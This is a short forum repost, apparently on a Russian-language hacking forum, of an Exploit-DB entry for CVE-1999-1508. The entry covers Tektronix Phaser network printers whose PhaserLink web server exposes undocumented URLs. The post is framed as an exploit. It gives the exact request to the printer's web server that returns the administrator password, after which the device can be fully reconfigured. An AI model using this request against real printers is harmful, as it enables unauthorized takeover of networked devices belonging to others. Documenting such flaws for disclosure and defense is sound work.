Exploit Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink WebServer - Retrieve Administrator Password

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19632
Проверка EDB
  1. Пройдено
Автор
DENNIS W. MATTISON
Тип уязвимости
REMOTE
Платформа
HARDWARE
CVE
cve-1999-1508
Дата публикации
1999-11-17
Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink WebServer - Retrieve Administrator Password
Код:
source: https://www.securityfocus.com/bid/806/info


Certain versions of the Tektronix PhaserLink printer ship with a webserver designed to help facilitate configuration of the device. This service is essentially administrator level access as it can completely modify the system characteristics, restart the machine, asign services etc.

In at least one version of this printer there are a series of undocumented URL's which will allow remote users to retrieve the administrator password. Once the password is obtained by the user, they can manipulate the printer in any way they see fit.

To obtain the administrator password:

http://printername/ncl_items.html?SUBJECT=2097
 
Источник
www.exploit-db.com

Похожие темы